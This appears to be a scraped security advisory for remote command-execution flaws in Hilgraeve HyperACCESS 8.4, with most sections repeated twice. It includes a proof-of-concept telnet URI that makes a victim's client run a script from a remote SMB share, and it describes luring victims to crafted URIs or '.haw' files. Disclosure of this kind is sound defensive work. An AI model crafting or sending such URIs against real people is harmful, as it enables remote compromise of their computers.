Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
BID:21594
Info
Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
| Bugtraq ID: | 21594 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2006 12:00AM |
| Updated: | Dec 15 2006 07:48PM |
| Credit: | Brett Moore <brett.mooresecurity-assessment.com> is credited with discovering this vulnerability. |
| Vulnerable: |
Hilgraeve HyperACCESS 8.4 |
| Not Vulnerable: | |
Discussion
Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
Hilgraeve HyperACCESS is prone to multiple remote command-execution vulnerabilities.
Attackers can exploit these issues to execute arbitrary application commands with the privileges of the affected application. A successful exploit could result in the compromise of affected computers.
Version 8.4 is vulnerable to these issues; prior versions may also be vulnerable.
Hilgraeve HyperACCESS is prone to multiple remote command-execution vulnerabilities.
Attackers can exploit these issues to execute arbitrary application commands with the privileges of the affected application. A successful exploit could result in the compromise of affected computers.
Version 8.4 is vulnerable to these issues; prior versions may also be vulnerable.
Exploit / POC
Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
To exploit these issues an attacker must entice a victim user to access a specially crafted URI or '.haw' file.
The following proof-of-concept telnet URI is available:
telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt
To exploit these issues an attacker must entice a victim user to access a specially crafted URI or '.haw' file.
The following proof-of-concept telnet URI is available:
telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt
Solution / Fix
Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Hilgraeve HyperAccess Multiple Remote Command Execution Vulnerabilities
References:
References:
- Hilgraeve Home Page (Hilgraeve)